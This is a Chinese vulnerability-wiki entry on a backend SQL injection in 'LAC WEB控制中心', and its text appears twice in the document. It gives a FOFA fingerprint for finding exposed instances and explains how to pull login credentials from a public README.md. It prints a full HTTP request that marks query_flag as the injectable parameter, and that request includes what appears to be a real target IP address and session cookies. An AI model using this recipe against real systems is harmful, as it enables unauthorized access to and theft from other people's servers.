fofamini-wiki

登录白背景

源码

LAC WEB控制中心后台SQL注入漏洞

漏洞描述

通过信息泄露获取系统登录账号密码，进入系统收获sql注入漏洞和存储XSS两枚（因为只是简单测试，可能还存在其他漏洞，有兴趣的小伙伴可以深挖下）

漏洞影响

LAC WEB控制中心

FOFA

body="欢迎进入LAC WEB控制中心"

漏洞复现

通过下载README.md文件，获取账号密码

http://x.x.x.x:8090/README.md

登录进入后台

查询出存在sql注入，注入参数为：query_flag，请求包：

GET /index.php/apbasic/index?tag=13&query_id=id&query_flag=123&query_style=input&query_require=%3D&query_field_id=&query_field_sort=&query_submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 QBCore/4.0.1326.400 QQBrowser/9.0.2524.400 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2875.116 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63010200)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://120.196.255.169:8090/index.php?a=index.php&m=index&a=index&m=apbasic&tag=13
Cookie: PHPSESSID=qpvtjv4ph8rs4ttn7vulr3cfb0; td_cookie=171049684; _currentUrl_=czo1NToiL2luZGV4LnBocD9hPWluZGV4LnBocCZtPWluZGV4JmE9aW5kZXgmbT1hcGJhc2ljJnRhZz0xMyI7
Connection: close
Upgrade-Insecure-Requests: 1

# LAC WEB控制中心后台SQL注入漏洞

## 漏洞描述

## 漏洞影响

> LAC WEB控制中心

## FOFA

> body="欢迎进入LAC WEB控制中心"

## 漏洞复现

通过下载README.md文件，获取账号密码

http://x.x.x.x:8090/README.md

![image-20210813185532076](/resource/LAC-WEB控制中心后台SQL注入漏洞/image-20210813185532076.png)

登录进入后台

![image-20210813185606536](/resource/LAC-WEB控制中心后台SQL注入漏洞/image-20210813185606536.png)

![image-20210813185632413](/resource/LAC-WEB控制中心后台SQL注入漏洞/image-20210813185632413.png)

查询出存在sql注入，注入参数为：query_flag，请求包：

```
GET /index.php/apbasic/index?tag=13&query_id=id&query_flag=123&query_style=input&query_require=%3D&query_field_id=&query_field_sort=&query_submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 QBCore/4.0.1326.400 QQBrowser/9.0.2524.400 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2875.116 Safari/537.36 NetType/WIFI MicroMessenger/7.0.20.1781(0x6700143B) WindowsWechat(0x63010200)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://120.196.255.169:8090/index.php?a=index.php&m=index&a=index&m=apbasic&tag=13
Cookie: PHPSESSID=qpvtjv4ph8rs4ttn7vulr3cfb0; td_cookie=171049684; _currentUrl_=czo1NToiL2luZGV4LnBocD9hPWluZGV4LnBocCZtPWluZGV4JmE9aW5kZXgmbT1hcGJhc2ljJnRhZz0xMyI7
Connection: close
Upgrade-Insecure-Requests: 1
```

![img](/resource/LAC-WEB控制中心后台SQL注入漏洞/wpsB8zzvJ.jpg)

![img](resource/LAC-WEB控制中心后台SQL注入漏洞/wpsZFGO01.jpg)